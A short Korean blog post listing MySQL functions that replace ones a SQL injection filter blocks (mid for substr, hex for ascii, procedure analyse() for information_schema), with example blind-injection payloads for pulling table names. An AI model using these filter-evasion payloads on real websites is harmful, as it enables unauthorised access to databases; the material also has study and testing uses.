SQL injection 필터링 대체 함수
substr - mid
ascii - hex
infromation_schema - procedure analyse()
예제모음)
1) ascii(substr(table_name,1,1)) >= 123%23
-> hex(mid(table_name,1,1)) >= 123%23 // 아스키코드대신 hex값으로 대조 하고 substr대신 mid함수로 자른다.
2) 컬럼,테이블,데이터베이스등의 이름을 알아와야하는데 union,select,infromation_schema 등이 필터링 됬을경우 procedure analyse()을 사용한다.
infromation - >union select null,null from information_schema.tables limit 0,1%23
procedure analyse() -> limit 0,1 procedure analyse() //이함수를 사용하면 union,select등 많은 함수를 생략할수 있다.
'프로그래밍 > Web' 카테고리의 다른 글
| jquery 풀메뉴 링크 모음 (0) | 2014.02.03 |
|---|---|
| blind sql injection - left,right 를 이용한 인젝션 (0) | 2014.02.03 |
| set character set gbk 취약점 (0) | 2013.12.18 |
| MySQL]root 비밀번호 변경방법 (0) | 2013.12.09 |
| [PHP] textarea (0) | 2013.12.09 |